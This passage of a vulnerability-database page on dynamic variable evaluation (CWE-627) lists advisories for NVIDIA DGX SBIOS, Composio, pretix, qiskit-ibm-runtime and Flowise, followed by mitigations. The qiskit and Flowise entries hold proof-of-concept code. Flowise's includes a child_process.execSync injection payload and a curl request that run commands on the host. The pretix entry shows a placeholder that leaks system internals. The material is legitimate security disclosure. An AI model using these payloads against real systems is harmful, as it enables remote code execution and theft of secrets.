        "discovery": "UNKNOWN"
      },
      "title": "CVE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9576f279-3576-44b5-a4af-b9a8644b2de6",
    "assignerShortName": "nvidia",
    "cveId": "CVE-2023-31032",
    "datePublished": "2024-01-12T18:31:36.994Z",
    "dateReserved": "2023-04-22T02:38:33.413Z",
    "dateUpdated": "2025-06-03T14:04:20.919Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-5Q7C-3GJ2-48QW

Vulnerability from github – Published: 2024-01-12 21:30 – Updated: 2024-01-12 21:30
VLAI
Details

NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-31032"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-627",
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-12T19:15:10Z",
    "severity": "HIGH"
  },
  "details": "NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.",
  "id": "GHSA-5q7c-3gj2-48qw",
  "modified": "2024-01-12T21:30:19Z",
  "published": "2024-01-12T21:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31032"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5510"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5XG7-5662-8X7J

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-22 00:19
VLAI
Summary
Composio Eval Injection Vulnerability
Details

In composiohq/composio version 0.4.3, the mathematical_calculator endpoint uses the unsafe eval() function to perform mathematical operations. This can lead to arbitrary code execution if untrusted input is passed to the eval() function.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "composio-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.43"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-8953"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-627"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-22T00:19:04Z",
    "nvd_published_at": "2025-03-20T10:15:44Z",
    "severity": "HIGH"
  },
  "details": "In composiohq/composio version 0.4.3, the mathematical_calculator endpoint uses the unsafe eval() function to perform mathematical operations. This can lead to arbitrary code execution if untrusted input is passed to the eval() function.",
  "id": "GHSA-5xg7-5662-8x7j",
  "modified": "2025-03-22T00:19:04Z",
  "published": "2025-03-20T12:32:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8953"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ComposioHQ/composio/commit/ed82fb45dc9fbd7f07c535c72bada871c158ae5f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ComposioHQ/composio-js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ComposioHQ/composio/blob/b932d99e67f0fe95f8a0a24be9352e3f99059bc3/python/composio/tools/local/mathematical/actions/calculator.py#L37"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/8203d721-e05f-4500-a5bc-c0bec980420c"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Composio Eval Injection Vulnerability"
}

GHSA-75MF-97WQ-JJPW

Vulnerability from github – Published: 2026-02-16 12:30 – Updated: 2026-03-13 15:31
VLAI
Details

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug:

It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.init.code.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for this plugin.

Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2451"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-627"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-16T11:15:56Z",
    "severity": "HIGH"
  },
  "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained a security-relevant bug:\n\nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for this plugin.\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg\u00a0file.",
  "id": "GHSA-75mf-97wq-jjpw",
  "modified": "2026-03-13T15:31:33Z",
  "published": "2026-02-16T12:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2451"
    },
    {
      "type": "WEB",
      "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:L/U:Red",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-CQ96-9974-V8HM

Vulnerability from github – Published: 2024-03-20 15:41 – Updated: 2024-03-20 15:41
VLAI
Summary
Dynamic Variable Evaluation in qiskit-ibm-runtime
Details

Summary

An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.

Details

https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140

PoC

A local exploit would be something like

from qiskit import transpiler

class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

Where print("external code") can be any arbitrary python code string.

Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:

from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)

This will print external code

Impact

Security vulnerability.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "qiskit-ibm-runtime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.11.0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-627"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-20T15:41:26Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "### Summary\n\nAn `eval()` method exists `Options._get_program_inputs`. This is bad in any case, but especially bad because `Options` are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.\n\n### Details\n\nhttps://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140\n\n### PoC\nA local exploit would be something like\n\n```python\nfrom qiskit import transpiler\n\nclass BadActor(transpiler.CouplingMap):\n    def __str__(self):\n        return \"print(\u0027external code\u0027)\"\n\n```\n\nWhere `print(\"external code\")` can be any arbitrary python code string.\n\nThen if you did a normal workflow and used a specifically constructed `CouplingMap` subclass like `BadActor` above:\n\n```python\nfrom qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler\nfrom qiskit import QuantumCircuit\n\ncmap = BadActor.from_line(42)\nservice = QiskitRuntimeService()\noptions = Options(optimization_level=1)\noptions.simulator = dict(coupling_map=cmap))\n\nbell = QuantumCircuit(2)\nbell.h(0)\nbell.cx(0, 1)\nbell.measure_all()\n\nwith Session(service=service, backend=\"ibmq_qasm_simulator\") as session:\n    sampler = Sampler(session=session, options=options).run(bell)\n```\n\nThis will print `external code`\n\n### Impact\n\nSecurity vulnerability.",
  "id": "GHSA-cq96-9974-v8hm",
  "modified": "2024-03-20T15:41:27Z",
  "published": "2024-03-20T15:41:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-cq96-9974-v8hm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Qiskit/qiskit-ibm-runtime/commit/2e8c8c8df83ba310f52d1651a426bad879e0bd38"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Qiskit/qiskit-ibm-runtime"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dynamic Variable Evaluation in qiskit-ibm-runtime"
}

GHSA-HMGH-466J-FX4C

Vulnerability from github – Published: 2025-10-06 14:08 – Updated: 2025-10-06 14:08
VLAI
Summary
Flowise vulnerable to RCE via Dynamic function constructor injection
Details

Summary

User-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE.

Details

When creating a new Custom MCP Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:

{
    "command": "npx",
    "args": ["-y", "@modelcontextprotocol/server-filesystem", "/path/to/allowed/files"]
}

Behind the scene, a POST request to /api/v1/node-load-method/customMCP is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):

{
...SNIP...

   "inputs":{
      "mcpServerConfig":{
         "command":"npx",
         "args":[
            "-y",
            "@modelcontextprotocol/server-filesystem",
            "/path/to/allowed/files"
         ]
      }
   },
   "loadMethod":"listActions"

...SNIP...
}

Sending the same request with the parameter mcpServerConfig equals to a plain value and not an object, for example:

{
   "inputs":{
      "mcpServerConfig":"test"
   },
   "loadMethod":"listActions"
}

We enter an interesting code flow that leads to a function named convertValidJSONString (Line 103): https://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103

async getTools(nodeData: INodeData): Promise<Tool[]> {
        const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string

        if (!mcpServerConfig) {
            throw new Error('MCP Server Config is required')
        }

        try {
            let serverParams
            if (typeof mcpServerConfig === 'object') {
                serverParams = mcpServerConfig
            } else if (typeof mcpServerConfig === 'string') {
                const serverParamsString = convertToValidJSONString(mcpServerConfig) <--
                serverParams = JSON.parse(serverParamsString)
            }

            const toolkit = new MCPToolkit(serverParams, 'stdio')
            await toolkit.initialize()

            const tools = toolkit.tools ?? []

            return tools as Tool[]
        } catch (error) {
            throw new Error(`Invalid MCP Server Config: ${error}`)
        }
    }
}

Here, the value of inputString originating from mcpServerConfig is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using eval:

function convertToValidJSONString(inputString: string) {
    try {
        const jsObject = Function('return ' + inputString)()
        return JSON.stringify(jsObject, null, 2)
    } catch (error) {
        console.error('Error converting to JSON:', error)
        return ''
    }
}

This JS code runs in the context of the host, not sandboxed using @flowiseai/nodevm like other code execution functionalities within the platform.

This enables access to the global process object and as a result access to all the native NodeJS modules available such as child_process, leading to Remote Code Execution.

{
    "inputs":{
        "mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"
        },
    "loadMethod":"listActions"
}

PoC

  1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as npx, pnpm, etc): https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker

  2. Create a new file named payload.json somewhere in your machine, with the following data:

{"inputs":{"mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"},
"loadMethod":"listActions"}
  1. Send the following curl request using the payload.json file created above with the following command:
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
  1. Observe that a new file named yofitofi is created under /tmp folder.

Impact

Remote code execution

Credit

The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.2.7-patch.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55346"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-627",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-06T14:08:45Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nUser-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE. \n\n### Details\nWhen creating a new `Custom MCP` Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:\n```json\n{\n\t\"command\": \"npx\",\n\t\"args\": [\"-y\", \"@modelcontextprotocol/server-filesystem\", \"/path/to/allowed/files\"]\n}\n```\n\nBehind the scene, a `POST` request to `/api/v1/node-load-method/customMCP` is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):\n```json\n{\n...SNIP...\n\n   \"inputs\":{\n      \"mcpServerConfig\":{\n         \"command\":\"npx\",\n         \"args\":[\n            \"-y\",\n            \"@modelcontextprotocol/server-filesystem\",\n            \"/path/to/allowed/files\"\n         ]\n      }\n   },\n   \"loadMethod\":\"listActions\"\n   \n...SNIP...\n}\n```\n\nSending the same request with the parameter `mcpServerConfig` equals to a plain value and not an object, for example:\n```json\n{\n   \"inputs\":{\n      \"mcpServerConfig\":\"test\"\n   },\n   \"loadMethod\":\"listActions\"\n}\n```\n\nWe enter an interesting code flow that leads to a function named `convertValidJSONString` (Line 103):\nhttps://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103\n\n```typescript\nasync getTools(nodeData: INodeData): Promise\u003cTool[]\u003e {\n        const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string\n\n        if (!mcpServerConfig) {\n            throw new Error(\u0027MCP Server Config is required\u0027)\n        }\n\n        try {\n            let serverParams\n            if (typeof mcpServerConfig === \u0027object\u0027) {\n                serverParams = mcpServerConfig\n            } else if (typeof mcpServerConfig === \u0027string\u0027) {\n                const serverParamsString = convertToValidJSONString(mcpServerConfig) \u003c--\n                serverParams = JSON.parse(serverParamsString)\n            }\n\n            const toolkit = new MCPToolkit(serverParams, \u0027stdio\u0027)\n            await toolkit.initialize()\n\n            const tools = toolkit.tools ?? []\n\n            return tools as Tool[]\n        } catch (error) {\n            throw new Error(`Invalid MCP Server Config: ${error}`)\n        }\n    }\n}\n```\n\nHere, the value of `inputString` originating from `mcpServerConfig` is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using `eval`:\n\n```typescript\nfunction convertToValidJSONString(inputString: string) {\n    try {\n        const jsObject = Function(\u0027return \u0027 + inputString)()\n        return JSON.stringify(jsObject, null, 2)\n    } catch (error) {\n        console.error(\u0027Error converting to JSON:\u0027, error)\n        return \u0027\u0027\n    }\n}\n```\n\nThis JS code runs in the context of the host, not sandboxed using `@flowiseai/nodevm` like other code execution functionalities within the platform.\n\nThis enables access to the global `process` object and as a result access to all the native NodeJS modules available such as `child_process`, leading to Remote Code Execution.\n```json\n{\n    \"inputs\":{\n        \"mcpServerConfig\":\"(global.process.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch /tmp/yofitofi\u0027))\"\n        },\n    \"loadMethod\":\"listActions\"\n}\n```\n### PoC\n1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as `npx`, `pnpm`, etc):\n   https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker\n\n2. Create a new file named `payload.json` somewhere in your machine, with the following data:\n```\n{\"inputs\":{\"mcpServerConfig\":\"(global.process.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch /tmp/yofitofi\u0027))\"},\n\"loadMethod\":\"listActions\"}\n```\n\n3. Send the following `curl` request using the `payload.json` file created above with the following command:\n```\ncurl -XPOST -H \"x-request-from: internal\" -H \"Content-Type: application/json\" --data @payload.json \"http://localhost:3000/api/v1/node-load-method/customMCP\"\n```\n\n4. Observe that a new file named `yofitofi` is created under `/tmp` folder.\n### Impact\nRemote code execution\n\n## Credit\nThe vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.",
  "id": "GHSA-hmgh-466j-fx4c",
  "modified": "2025-10-06T14:08:45Z",
  "published": "2025-10-06T14:08:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hmgh-466j-fx4c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise vulnerable to RCE via Dynamic function constructor injection"
}

Mitigation
Implementation

Strategy: Refactoring

Refactor the code to avoid dynamic variable evaluation whenever possible.

Mitigation
Implementation

Strategy: Input Validation

Use only allowlists of acceptable variable or function names.

Mitigation
Implementation

For function names, ensure that you are only calling functions that accept the proper number of arguments, to avoid unexpected null arguments.

No CAPEC attack patterns related to this CWE.